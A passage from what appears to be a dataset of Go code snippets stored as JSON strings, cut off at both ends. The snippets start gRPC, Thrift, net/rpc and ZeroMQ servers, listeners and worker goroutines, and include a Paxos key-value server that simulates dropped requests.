{\n\t\tif err := serve(context.Background(), listener, h); err != nil && !strings.Contains(err.Error(), \"use of closed network connection\") {\n\t\t\tt.Fatal(\"jsonrpc2.Serve:\", err)\n\t\t}\n\t}()\n\treturn listener\n}", "func (t *gRPCTransport) start() {\n\t// start Communicate RPC\n\tif t.l() {\n\t\tt.logger.Info(\"starting gRPC server\")\n\t}\n\tgo func() {\n\t\terr := t.grpcServer.Serve(t.lis)\n\t\tif err != nil && t.l() {\n\t\t\tt.logger.Error(\"gRPC serve ended with error\", zap.Error(err))\n\t\t}\n\t}()\n\n\t// connect to peers' RaftProtocolServers\n\tdone := make(chan struct{})\n\tfor _, p := range t.peers {\n\t\tgo func(p *peer) {\n\t\t\tp.connectLoop()\n\t\t\tdone <- struct{}{}\n\t\t}(p)\n\t}\n\tfor range t.peers {\n\t\t<-done\n\t}\n\tfor _, p := range t.peers {\n\t\tgo p.loop()\n\t}\n\tif t.l() {\n\t\tt.logger.Info(\"connected to all peers\")\n\t}\n\n\t// start sendLoop\n\tgo t.sendLoop()\n}", "func (this *Engine) launchRpcServe() (done chan null.NullStruct) {\n\tvar (\n\t\tprotocolFactory thrift.TProtocolFactory\n\t\tserverTransport thrift.TServerTransport\n\t\ttransportFactory thrift.TTransportFactory\n\t\terr error\n\t\tserverNetwork string\n\t)\n\n\tswitch config.Engine.Rpc.Protocol {\n\tcase \"binary\":\n\t\tprotocolFactory = thrift.NewTBinaryProtocolFactoryDefault()\n\n\tcase \"json\":\n\t\tprotocolFactory = thrift.NewTJSONProtocolFactory()\n\n\tcase \"simplejson\":\n\t\tprotocolFactory = thrift.NewTSimpleJSONProtocolFactory()\n\n\tcase \"compact\":\n\t\tprotocolFactory = thrift.NewTCompactProtocolFactory()\n\n\tdefault:\n\t\tpanic(fmt.Sprintf(\"Unknown protocol: %s\", config.Engine.Rpc.Protocol))\n\t}\n\n\t// client-side Thrift protocol/transport stack must match\n\t// the server-side, otherwise you are very likely to get in trouble\n\tswitch {\n\tcase config.Engine.Rpc.Framed:\n\t\t// each payload is sent over the wire with a frame header containing its size\n\t\ttransportFactory = thrift.NewTFramedTransportFactory(transportFactory)\n\n\tdefault:\n\t\t// there is no BufferedTransport in Java: only FramedTransport\n\t\ttransportFactory = thrift.NewTBufferedTransportFactory(\n\t\t\tconfig.Engine.Rpc.BufferSize)\n\t}\n\n\tswitch {\n\tcase strings.Contains(config.Engine.Rpc.ListenAddr, \"/\"):\n\t\tserverNetwork = \"unix\"\n\t\tif config.Engine.Rpc.SessionTimeout > 0 {\n\t\t\tserverTransport, err = NewTUnixSocketTimeout(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr, config.Engine.Rpc.SessionTimeout)\n\t\t} else {\n\t\t\tserverTransport, err = NewTUnixSocket(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr)\n\t\t}\n\n\tdefault:\n\t\tserverNetwork = \"tcp\"\n\t\tif config.Engine.Rpc.SessionTimeout > 0 {\n\t\t\tserverTransport, err = thrift.NewTServerSocketTimeout(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr, config.Engine.Rpc.SessionTimeout)\n\t\t} else {\n\t\t\tserverTransport, err = thrift.NewTServerSocket(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr)\n\t\t}\n\t}\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// dial zk before startup servants\n\t// because proxy servant is dependent upon zk\n\tif config.Engine.EtcdSelfAddr != \"\" {\n\t\tif err := etclib.Dial(config.Engine.EtcdServers); err != nil {\n\t\t\tpanic(err)\n\t\t} else {\n\t\t\tlog.Debug(\"etcd connected: %+v\", config.Engine.EtcdServers)\n\t\t}\n\t}\n\n\t// when config loaded, create the servants\n\tthis.svt = servant.NewFunServantWrapper(config.Engine.Servants)\n\tthis.rpcProcessor = rpc.NewFunServantProcessor(this.svt)\n\tthis.svt.Start()\n\n\tthis.rpcServer = NewTFunServer(this,\n\t\tconfig.Engine.Rpc.PreforkMode,\n\t\tthis.rpcProcessor,\n\t\tserverTransport, transportFactory, protocolFactory)\n\tlog.Info(\"RPC server ready at %s:%s\", serverNetwork, config.Engine.Rpc.ListenAddr)\n\n\tthis.launchDashboard()\n\n\tdone = make(chan null.NullStruct)\n\tgo func() {\n\t\tif err = this.rpcServer.Serve(); err != nil {\n\t\t\tlog.Error(\"RPC server: %+v\", err)\n\t\t}\n\n\t\tdone <- null.Null\n\t}()\n\n\treturn done\n}", "func (twrkr *twerk) startWorker() {\n\n\tgo func() {\n\t\ttwrkr.waitOnWorld()\n\t\ttwrkr.liveWorkersNum.Incr()\n\t\tdefer func() {\n\t\t\ttwrkr.waitOnWorld()\n\t\t\ttwrkr.liveWorkersNum.Decr()\n\t\t}()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase job, _ := <-twrkr.jobListener:\n\t\t\t\ttwrkr.waitOnWorld()\n\t\t\t\ttwrkr.currentlyWorkingNum.Incr()\n\t\t\t\treturnValues := twrkr.callable.CallFunction(job.arguments)\n\t\t\t\tif len(returnValues) > 0 {\n\t\t\t\t\tgo func() {\n\t\t\t\t\t\tjob.returnTo <- returnValues\n\t\t\t\t\t\tclose(job.returnTo)\n\t\t\t\t\t}()\n\t\t\t\t}\n\t\t\t\ttwrkr.waitOnWorld()\n\t\t\t\ttwrkr.currentlyWorkingNum.Decr()\n\t\t\tcase <-twrkr.broadcastDie:\n\t\t\t\t// somebody requested that we die\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n\n}", "func (g *GRPC) Run() error {\n\tvar err error\n\tg.listener, err = net.Listen(connProtocol, fmt.Sprintf(\":%s\", g.port))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tgo g.serve()\n\treturn nil\n}", "func (f *framework) startHTTP() {\n\tf.log.Printf(\"serving grpc on %s\\n\", f.ln.Addr())\n\terr := f.task.CreateServer().Serve(f.ln)\n\tselect {\n\tcase <-f.httpStop:\n\t\tf.log.Printf(\"grpc stops serving\")\n\tdefault:\n\t\tif err != nil {\n\t\t\tf.log.Fatalf(\"grpc.Serve returns error: %v\\n\", err)\n\t\t}\n\t}\n}", "func (w *worker) start() {\n\tgo func() {\n\t\tfor {\n\t\t\tw.workerPool <- w.JobChannel\n\n\t\t\tjob := <-w.JobChannel\n\t\t\thandler, err := w.CommandHandler.GetHandler(job)\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif !job.IsValid() {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif err = handler.Handle(job); err != nil {\n\t\t\t\tglog.Error(err)\n\t\t\t}\n\t\t}\n\t}()\n}", "func init(){\n\tskeleton.RegisterChanRPC(reflect.TypeOf(&msg.Hello{}), handleHello)\n}", "func main() {\n\t\n\tlog.Println(\"start of twitter-streamer server -- twitter-streamer .....\")\n\n\tlistener, err := net.Listen(\"tcp\",\"localhost\"+port) // setup listener\n\tif err != nil {\n\t\tlog.Fatalf(\"Server, failed on listen: %v\",err)\n\t}\n\tgrpcServer := grpc.NewServer()\n\tpb.RegisterTweetServiceServer(grpcServer, new(server)) // register the service\n\n\tlog.Printf(\"server listening on port -> %s\\n\",port)\n\t\n\tif err := grpcServer.Serve(listener); err != nil { // listen serve client connections\n\t\tlog.Fatalf(\"Server, failed to server: %v\",err)\n\t}\n}", "func (r *RPCServer) Start() (err error) {\n\t// register the shared methods\n\trpc.Register(&shared.Handler{\n\t\tStore: r.store,\n\t})\n\n\tlog.Print(\"Starting RPC server on port: \", r.port)\n\tr.listener, err = net.Listen(\"tcp\", r.port)\n\tif err != nil {\n\t\treturn\n\t}\n\n\trpc.Accept(r.listener)\n\n\treturn\n}", "func setUpRPC(nodeRPC string) {\n\trpcServ := new(Service)\n\trpc.Register(rpcServ)\n\trpcAddr, err := net.ResolveTCPAddr(\"tcp\", nodeRPC)\n\tif err != nil {\n\t\tlog.Fatal(\"listen error:\", err)\n\t}\n\tl, e := net.ListenTCP(consts.TransProtocol, rpcAddr)\n\tif e != nil {\n\t\tlog.Fatal(\"listen error:\", e)\n\t}\n\tfor i := 0; i >= 0; i++ {\n\t\tconn, _ := l.AcceptTCP()\n\t\tcolorprint.Alert(\"=========================================================================================\")\n\t\tcolorprint.Debug(\"REQ \" + strconv.Itoa(i) + \": ESTABLISHING RPC REQUEST CONNECTION WITH \" + conn.LocalAddr().String())\n\t\tgo rpc.ServeConn(conn)\n\t\tcolorprint.Blue(\"REQ \" + strconv.Itoa(i) + \": Request Served\")\n\t\tcolorprint.Alert(\"=========================================================================================\")\n\t\tdefer conn.Close()\n\t}\n\tl.Close()\n\n\t// rpcServ := new(FTService)\n\t// rpc.Register(rpcServ)\n\t// rpcAddr, err := net.ResolveTCPAddr(\"tcp\", nodeRPC)\n\t// if err != nil {\n\t// \tlog.Fatal(\"listen error:\", err)\n\t// }\n\t// l, e := net.ListenTCP(consts.TransProtocol, rpcAddr)\n\t// if e != nil {\n\t// \tlog.Fatal(\"listen error:\", e)\n\t// }\n\t// for i := 0; i >= 0; i++ {\n\t// \tconn, _ := l.AcceptTCP()\n\t// \tcolorprint.Alert(\"=========================================================================================\")\n\t// \tcolorprint.Debug(\"REQ \" + strconv.Itoa(i) + \": ESTABLISHING RPC REQUEST CONNECTION WITH \" + conn.LocalAddr().String())\n\t// \trpc.ServeConn(conn)\n\t// \tcolorprint.Blue(\"REQ \" + strconv.Itoa(i) + \": Request Served\")\n\t// \tcolorprint.Alert(\"=========================================================================================\")\n\t// \t//defer conn.Close()\n\t// }\n\t// l.Close()\n\n}", "func main() {\n\trequests = make(chan *Message, 50)\n\n\t//Initialize Server\n\tnotListening := make(chan bool)\n\t//log.Printf(\"STATUS: %v INBRANCH: %v FCOUNT: %v\", ThisNode.SN, (*ThisNode.inBranch).Weight, ThisNode.findCount)\n\tgo func(nl chan bool) {\n\t\tdefer func() {\n\t\t\tnl <- true\n\t\t}()\n\t\tl, err := net.Listen(\"tcp\", PORT)\n\t\tfmt.Println(\"Listening\")\n\t\tLogger.Println(\"Listening\")\n\t\tif err != nil {\n\t\t\tLogger.Fatal(err)\n\t\t}\n\n\t\tfor {\n\t\t\tconn, err := l.Accept()\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatal(err)\n\t\t\t}\n\n\t\t\t// Handle the connection in a new goroutine.\n\t\t\tgo serveConn(conn, requests)\n\t\t}\n\t}(notListening)\n\n\t//Process incomming messages\n\tgo processMessage(requests)\n\n\tif wakeup {\n\t\ttime.Sleep(time.Second * 11)\n\t\tThisNode.Wakeup()\n\t}\n\n\t//Wait until listening routine sends signal\n\t<-notListening\n}", "func (w *Worker) Listen() (err error) {\n\tif w.WorkerID == \"\" || w.RequestID == \"\" {\n\t\treturn errors.Errorf(\"workerID and requestID required\")\n\t}\n\tstream, err := w.eventStream()\n\tif err == nil {\n\t\tif err = stream.Start(); err != nil {\n\t\t\treturn\n\t\t}\n\t\tdefer stream.Stop()\n\t\tstream.Send(&rpc.StreamingMessage{\n\t\t\tContent: &rpc.StreamingMessage_StartStream{\n\t\t\t\tStartStream: &rpc.StartStream{\n\t\t\t\t\tWorkerId: w.WorkerID,\n\t\t\t\t},\n\t\t\t},\n\t\t})\n\t\tch := w.getChannel(stream)\n\t\tmsg, ok := stream.Recv()\n\t\tfor ok {\n\t\t\tswitch msgT := msg.Content.(type) {\n\t\t\tcase *rpc.StreamingMessage_StartStream:\n\t\t\t\tch.StartStream(msg.RequestId, msgT.StartStream)\n\t\t\tcase *rpc.StreamingMessage_WorkerInitRequest:\n\t\t\t\tch.InitRequest(msg.RequestId, msgT.WorkerInitRequest)\n\t\t\tcase *rpc.StreamingMessage_WorkerHeartbeat:\n\t\t\t\tch.Heartbeat(msg.RequestId, msgT.WorkerHeartbeat)\n\t\t\tcase *rpc.StreamingMessage_WorkerTerminate:\n\t\t\t\tch.Terminate(msg.RequestId, msgT.WorkerTerminate)\n\t\t\tcase *rpc.StreamingMessage_WorkerStatusRequest:\n\t\t\t\tch.StatusRequest(msg.RequestId, msgT.WorkerStatusRequest)\n\t\t\tcase *rpc.StreamingMessage_FileChangeEventRequest:\n\t\t\t\tch.FileChangeEventRequest(msg.RequestId, msgT.FileChangeEventRequest)\n\t\t\tcase *rpc.StreamingMessage_FunctionLoadRequest:\n\t\t\t\tch.FunctionLoadRequest(msg.RequestId, msgT.FunctionLoadRequest)\n\t\t\tcase *rpc.StreamingMessage_InvocationRequest:\n\t\t\t\tch.InvocationRequest(msg.RequestId, msgT.InvocationRequest)\n\t\t\tcase *rpc.StreamingMessage_InvocationCancel:\n\t\t\t\tch.InvocationCancel(msg.RequestId, msgT.InvocationCancel)\n\t\t\tcase *rpc.StreamingMessage_FunctionEnvironmentReloadRequest:\n\t\t\t\tch.FunctionEnvironmentReloadRequest(msg.RequestId, msgT.FunctionEnvironmentReloadRequest)\n\t\t\t}\n\t\t\tmsg, ok = stream.Recv()\n\t\t}\n\t}\n\treturn\n}", "func (w *Worker) Start() {\n\tgo func() {\n\t\tfor {\n\t\t\t// Add ourselves into the worker queue.\n\t\t\tw.WorkerQueue <- w.Work\n\n\t\t\tselect {\n\t\t\tcase work := <-w.Work:\n\t\t\t\t// Receive a work request.\n\t\t\t\tvar ris Response\n\t\t\t\tris.RequestId = work.RequestId\n\t\t\t\tris.Result, ris.Correct, ris.NSV = generateTrainset(work.TsToAnalyze, w.TsData, w.Output)\n\t\t\t\twork.Response <- ris\n\t\t\tcase <-w.QuitChan:\n\t\t\t\t// We have been asked to stop.\n\t\t\t\tlog.Printf(\"worker%d stopping\\n\", w.ID)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n}", "func Run(ctx context.Context, port string) struct{} {\n\n\t//The server to get up\n\tli, err := net.Listen(\"tcp\", port)\n\tif err != nil {\n\t\tlog.Fatalf(\"Server stopped: %v\", err)\n\t}\n\n\t//Passing the server to grpc\n\ts := &Server{}\n\tgrpcServer := grpc.NewServer()\n\tsubscribe.RegisterSubscribeServiceServer(grpcServer, s)\n\tgrpcServer.Serve(li)\n\n\tfmt.Printf(\"Server up on port: %v\\n\", err)\n\treturn <-ctx.Done()\n}", "func (gw *GrpcWrapper) Start() error {\n\tif gw.ln != nil {\n\t\treturn nil\n\t}\n\tln, err := net.Listen(\"tcp\", fmt.Sprintf(\":%d\", gw.port))\n\tif err != nil {\n\t\tgw.logger.WithFields(log.Fields{\n\t\t\t\"error\": err.Error(),\n\t\t\t\"port\": gw.port,\n\t\t}).Error(\"net.Listen() error\")\n\t\treturn err\n\t}\n\tgw.ln = ln\n\n\tgw.logger.WithFields(log.Fields{\"port\": gw.port}).Info(\"TCP net listener initialized\")\n\n\tserver := grpc.NewServer(grpc.StatsHandler(&ocgrpc.ServerHandler{}))\n\tfor _, handlerFunc := range gw.handlerFuncs {\n\t\thandlerFunc(server)\n\t}\n\tgw.server = server\n\tgw.grpcAwaiter = make(chan error)\n\n\tgo func() {\n\t\tgw.logger.Infof(\"Serving gRPC on :%d\", gw.port)\n\t\terr := gw.server.Serve(ln)\n\t\tgw.grpcAwaiter <- err\n\t\tif err != nil {\n\t\t\tgw.logger.WithFields(log.Fields{\"error\": err.Error()}).Error(\"gRPC serve() error\")\n\t\t}\n\t}()\n\n\treturn nil\n}", "func (w *worker) start() {\n\tatomic.StoreInt32(&w.running, 1)\n\tw.startCh <- struct{}{}\n}", "func worker() {\n\tworker, err := zmq4.NewSocket(zmq4.DEALER)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\tdefer worker.Close()\n\tworker.Connect(\"inproc://backend\")\n\n\tfor {\n\t\tmsg, err := worker.RecvMessage(0)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\n\t\tid, content := pop(msg)\n\n\t\treplies := rand.Intn(5)\n\t\tfor reply := 0; reply < replies; reply++ {\n\t\t\ttime.Sleep(time.Duration(rand.Intn(1000)+1) * time.Millisecond)\n\t\t\tworker.SendMessage(id, content)\n\t\t}\n\t}\n}", "func workerTask() {\n\tworker, err := zmq4.NewSocket(zmq4.REQ)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\tdefer worker.Close()\n\tworker.Connect(\"ipc://backend.ipc\")\n\tworker.SendMessage(WorkerReady)\n\n\tfor {\n\n\t\tmsg, err := worker.RecvMessage(0)\n\t\tif err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tmsg[len(msg)-1] = \"OK\"\n\t\tworker.SendMessage(msg)\n\t}\n\n}", "func (s *serv) Start() {\n\ts.running = true\n\n\tsem := make(chan byte)\n\n\tgo func() {\n\t\t// Start listening\n\t\ts.listen()\n\t\tsem <- 0\n\t}()\n\n\tgo func() {\n\t\tfor {\n\t\t\tp := <-s.pks\n\t\t\t// Dispatch work\n\t\t\tswitch p.(type) {\n\t\t\tcase *network.MessagePacket:\n\t\t\t\t_ = p.(*network.MessagePacket)\n\t\t\tcase *network.ConnectionPacket:\n\t\t\t\t_ = p.(*network.ConnectionPacket)\n\t\t\tdefault:\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t}()\n\n\t<-sem\n}", "func main() {\n\tgob.Register(&net.TCPAddr{})\n\n\tknownFiles = make(map[string][]string)\n\trand.Seed(time.Now().UnixNano())\n\n\targs := os.Args[1:]\n\tserverIP := args[0]\n\tServerInterface := new(MyServer)\n\tserverRPC := rpc.NewServer()\n\tregisterServer(serverRPC, ServerInterface)\n\tl, e := net.Listen(\"tcp\", serverIP)\n\tif e != nil {\n\t\tlog.Fatal(\"server error:\", e)\n\t\treturn\n\t}\n\n\tfor {\n\t\tconn, _ := l.Accept()\n\t\tgo serverRPC.ServeConn(conn)\n\t}\n}", "func startupServer(t *testing.T) (lightning *glightning.Lightning, requestQ, replyQ chan []byte) {\n\ttmpfile, err := ioutil.TempFile(\"\", \"rpc.socket\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tos.Remove(tmpfile.Name())\n\n\trequestQueue := make(chan []byte)\n\treplyQueue := make(chan []byte)\n\tok := make(chan bool)\n\n\tgo func(socket string, t *testing.T, requestQueue, replyQueue chan []byte, ok chan bool) {\n\t\tln, err := net.Listen(\"unix\", socket)\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t\tfor {\n\t\t\tok <- true\n\t\t\tinconn, err := ln.Accept()\n\t\t\tif err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\t\t\tgo listen(inconn, requestQueue, t)\n\t\t\tgo writer(inconn, replyQueue, t)\n\t\t}\n\t}(tmpfile.Name(), t, requestQueue, replyQueue, ok)\n\n\t// block until the socket is listening\n\t<-ok\n\n\tlightning = glightning.NewLightning()\n\tlightning.StartUp(\"\", tmpfile.Name())\n\treturn lightning, requestQueue, replyQueue\n}", "func (s *Server) serve(lis net.Listener) {\n\ts.wg.Add(1)\n\tgo func() {\n\t\tlog.Infof(\"Listening on %s\", lis.Addr())\n\t\terr := s.httpServer.Serve(lis)\n\t\tlog.Tracef(\"Finished serving RPC: %v\", err)\n\t\ts.wg.Done()\n\t}()\n}", "func main() {\n\t// create a listener on TCP port 7777\n\tlis, err := net.Listen(\"tcp\", \":7777\")\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to listen: %v\", err)\n\t}\n\n\t// create a server instance\n\ts := api.Server{}\n\n\t// create the TLS creds\n\tcreds, err := credentials.NewServerTLSFromFile(\"cert/server.crt\", \"cert/server.key\")\n\tif err != nil {\n\t\tlog.Fatalf(\"could not load TLS keys: %s\", err)\n\t}\n\n\t// add credentials to the gRPC options\n\topts := []grpc.ServerOption{grpc.Creds(creds)}\n\n\t// create a gRPC server object\n\tgrpcServer := grpc.NewServer(opts...)\n\n\t// attach the Ping service to the server\n\tapi.RegisterPingServer(grpcServer, &s)\n\n\t// start the server\n\tif err := grpcServer.Serve(lis); err != nil {\n\t\tlog.Fatalf(\"failed to serve: %v\", err)\n\t}\n}", "func main() {\n\tlis, err := net.Listen(\"tcp\", \":9091\")\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to listen: %v\", err)\n\t}\n\n\tdao := database.CreateDAO(database.CreateConn())\n\tsvc := service.CreateService(dao)\n\n\tgrpcServer := grpc.NewServer()\n\n\t// attach the Ping service to the server\n\tpb.RegisterDBServer(grpcServer, &svc)\n\t// start the server\n\tif err := grpcServer.Serve(lis); err != nil {\n\t\tlog.Fatalf(\"failed to serve: %s\", err)\n\t}\n}", "func LaunchRpcServer() {\n\t// Setup replica server\n\taddy, err := net.ResolveTCPAddr(\"tcp\", \"0.0.0.0:\"+strconv.Itoa(config.Replication.Rpc_server_port_num))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// Set listener\n\tinbound, err := net.ListenTCP(\"tcp\", addy)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// Launch\n\tlog.Println(\"RPC Server Listening to... http://0.0.0.0:\" + strconv.Itoa(config.Replication.Rpc_server_port_num))\n\tlistener := new(Listener)\n\trpc.Register(listener)\n\trpc.Accept(inbound)\n\n}", "func (m *Manager) Start(srv *server.TCP) {\n\tm.serverMutex.Lock()\n\tdefer m.serverMutex.Unlock()\n\n\tm.server = srv\n\n\tm.messageWorkerPool.Start()\n\tm.messageRequestWorkerPool.Start()\n}", "func StartServer(servers []string, me int) *KVPaxos {\n // this call is all that's needed to persuade\n // Go's RPC library to marshall/unmarshall\n // struct Op.\n gob.Register(Op{})\n\n kv := new(KVPaxos)\n kv.me = me\n\n // Your initialization code here.\n kv.data = make(map[string]string)\n kv.pendingRead = make(map[int64]*PendingRead)\n kv.applied = -1\n\n rpcs := rpc.NewServer()\n rpcs.Register(kv)\n\n kv.px = paxos.Make(servers, me, rpcs)\n\n // start worker\n kv.StartBackgroundWorker()\n\n os.Remove(servers[me])\n l, e := net.Listen(\"unix\", servers[me]);\n if e != nil {\n log.Fatal(\"listen error: \", e);\n }\n kv.l = l\n\n // please do not change any of the following code,\n // or do anything to subvert it.\n\n go func() {\n for kv.dead == false {\n conn, err := kv.l.Accept()\n if err == nil && kv.dead == false {\n if kv.unreliable && (rand.Int63() % 1000) < 100 {\n // discard the request.\n conn.Close()\n } else if kv.unreliable && (rand.Int63() % 1000) < 200 {\n // process the request but force discard of reply.\n c1 := conn.(*net.UnixConn)\n f, _ := c1.File()\n err := syscall.Shutdown(int(f.Fd()), syscall.SHUT_WR)\n if err != nil {\n fmt.Printf(\"shutdown: %v\\n\", err)\n }\n go rpcs.ServeConn(conn)\n } else {\n go rpcs.ServeConn(conn)\n }\n } else if err == nil {\n conn.Close()\n }\n if err != nil && kv.dead == false {\n fmt.Printf(\"KVPaxos(%v) accept: %v\\n\", me, err.Error())\n kv.kill()\n }\n }\n }()\n\n return kv\n}", "func (s *server) Start() {\n\t// A duplicator for notifications intended for all clients runs\n\t// in another goroutines. Any such notifications are sent to\n\t// the allClients channel and then sent to each connected client.\n\t//\n\t// Use a sync.Once to insure no extra duplicators run.\n\tgo duplicateOnce.Do(clientResponseDuplicator)\n\n\tlog.Trace(\"Starting RPC server\")\n\n\tserveMux := http.NewServeMux()\n\tconst rpcAuthTimeoutSeconds = 10\n\thttpServer := &http.Server{\n\t\tHandler: serveMux,\n\n\t\t// Timeout connections which don't complete the initial\n\t\t// handshake within the allowed timeframe.\n\t\tReadTimeout: time.Second * rpcAuthTimeoutSeconds,\n\t}\n\tserveMux.HandleFunc(\"/\", func(w http.ResponseWriter, r *http.Request) {\n\t\tif err := s.checkAuth(r); err != nil {\n\t\t\tlog.Warnf(\"Unauthorized client connection attempt\")\n\t\t\thttp.Error(w, \"401 Unauthorized.\", http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\t\ts.ServeRPCRequest(w, r)\n\t})\n\tserveMux.HandleFunc(\"/frontend\", func(w http.ResponseWriter, r *http.Request) {\n\t\tauthenticated := false\n\t\tif err := s.checkAuth(r); err != nil {\n\t\t\t// If auth was supplied but incorrect, rather than simply being\n\t\t\t// missing, immediately terminate the connection.\n\t\t\tif err != ErrNoAuth {\n\t\t\t\tlog.Warnf(\"Disconnecting improperly authorized websocket client\")\n\t\t\t\thttp.Error(w, \"401 Unauthorized.\", http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\tauthenticated = true\n\t\t}\n\n\t\t// A new Server instance is created rather than just creating the\n\t\t// handler closure since the default server will disconnect the\n\t\t// client if the origin is unset.\n\t\twsServer := websocket.Server{\n\t\t\tHandler: websocket.Handler(func(ws *websocket.Conn) {\n\t\t\t\ts.WSSendRecv(ws, r.RemoteAddr, authenticated)\n\t\t\t}),\n\t\t}\n\t\twsServer.ServeHTTP(w, r)\n\t})\n\tfor _, listener := range s.listeners {\n\t\ts.wg.Add(1)\n\t\tgo func(listener net.Listener) {\n\t\t\tlog.Infof(\"RPCS: RPC server listening on %s\", listener.Addr())\n\t\t\thttpServer.Serve(listener)\n\t\t\tlog.Tracef(\"RPCS: RPC listener done for %s\", listener.Addr())\n\t\t\ts.wg.Done()\n\t\t}(listener)\n\t}\n}", "func main() {\n\n\tlis ,err := net.Listen(\"tcp\",fmt.Sprintf(\":%d\", 1368))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tserver := grpc.NewServer()\n\trpc.RegisterUserServiceServer(server, &service.UserService{})\n\n\terr = server.Serve(lis)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func (a *agent) listen(wg *sync.WaitGroup) {\n\tLog().Debugf(\"Starting EventLoop on %d-%s\", a.ID, a.Label)\n\tfor e := range a.packetChan {\n\t\t// Receive a work request.\n\t\tmetrics.set(METRIC_CONNECTION_TRANSIT, a.conf.PipelineName, a.Label, len(a.packetChan))\n\t\tif err := a.processor.Receive(e); err != nil {\n\t\t\tLog().Errorf(\"agent %s: %s\", a.conf.Type, err.Error())\n\t\t}\n\t\tmetrics.increment(METRIC_PROC_IN, a.conf.PipelineName, a.Label)\n\t}\n\twg.Done()\n}", "func (w *worker) start() {\n\tgo func() {\n\t\tfor {\n\t\t\tw.WorkerQueue <- w.Job\n\n\t\t\tselect {\n\t\t\tcase job := <-w.Job:\n\t\t\t\tlog.Printf(\"worker %d: %s\", w.ID, job.User.Login)\n\t\t\t\tjob.User.run()\n\t\t\tcase <-done:\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n}", "func (h *Hub) Serve() error {\n\th.startTime = time.Now()\n\n\tip, err := util.GetPublicIP()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tworkersPort, err := util.ParseEndpointPort(h.endpoint)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tclientPort, err := util.ParseEndpointPort(h.grpcEndpoint)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tworkersEndpt := ip.String() + \":\" + workersPort\n\tclientEndpt := ip.String() + \":\" + clientPort\n\n\tsrv, err := frd.NewServer(h.ethKey, workersEndpt, clientEndpt)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = srv.Start()\n\tif err != nil {\n\t\treturn err\n\t}\n\tsrv.Serve()\n\n\tlistener, err := net.Listen(\"tcp\", h.endpoint)\n\n\tif err != nil {\n\t\tlog.G(h.ctx).Error(\"failed to listen\", zap.String(\"address\", h.endpoint), zap.Error(err))\n\t\treturn err\n\t}\n\tlog.G(h.ctx).Info(\"listening for connections from Miners\", zap.Stringer(\"address\", listener.Addr()))\n\n\tgrpcL, err := net.Listen(\"tcp\", h.grpcEndpoint)\n\tif err != nil {\n\t\tlog.G(h.ctx).Error(\"failed to listen\",\n\t\t\tzap.String(\"address\", h.grpcEndpoint), zap.Error(err))\n\t\tlistener.Close()\n\t\treturn err\n\t}\n\tlog.G(h.ctx).Info(\"listening for gRPC API connections\", zap.Stringer(\"address\", grpcL.Addr()))\n\t// TODO: fix this possible race: Close before Serve\n\th.minerListener = listener\n\n\th.wg.Add(1)\n\tgo func() {\n\t\tdefer h.wg.Done()\n\t\th.externalGrpc.Serve(grpcL)\n\t}()\n\n\th.wg.Add(1)\n\tgo func() {\n\t\tdefer h.wg.Done()\n\t\tfor {\n\t\t\tconn, err := h.minerListener.Accept()\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\tgo h.handleInterconnect(h.ctx, conn)\n\t\t}\n\t}()\n\th.wg.Wait()\n\n\treturn nil\n}", "func (w Worker) Start() {\n\tgo func() {\n\t\tfor {\n\t\t\t// register the current worker into the worker queue.\n\t\t\tw.WorkerPool <- w.JobChannel\n\n\t\t\tselect {\n\t\t\tcase job := <-w.JobChannel:\n\n\t\t\t\t// we have received a work request.\n\t\t\t\tlog.Println(job.payload.HealthCheck())\n\n\t\t\tcase <-w.QuitChan:\n\t\t\t\t// we have received a signal to stop\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n}", "func (s *Server) Run() <-chan error {\n\tvar chErr chan error\n\tlog.Infoln(fmt.Sprintf(\"gRPC server has started at port %d\", s.port))\n\tgo func() {\n\t\tif err := s.server.Serve(s.listener); err != nil {\n\t\t\tchErr <- err\n\t\t}\n\t}()\n\treturn chErr\n}", "func (w *worker) startWorker() {\n\tzap.L().Info(\"Starting InfluxDBworker\")\n\tfor {\n\t\tselect {\n\t\tcase event := <-w.events:\n\t\t\tw.processEvent(event)\n\t\tcase <-w.stop:\n\t\t\treturn\n\t\t}\n\t}\n}", "func (g GrpcServer) Start() {\n\tgo func() {\n\t\tg.errCh <- g.server.Serve(g.listener)\n\t}()\n}", "func (tc *textileClient) start(ctx context.Context, cfg config.Config) error {\n\ttc.cfg = cfg\n\tauth := common.Credentials{}\n\tvar opts []grpc.DialOption\n\n\topts = append(opts, grpc.WithInsecure())\n\topts = append(opts, 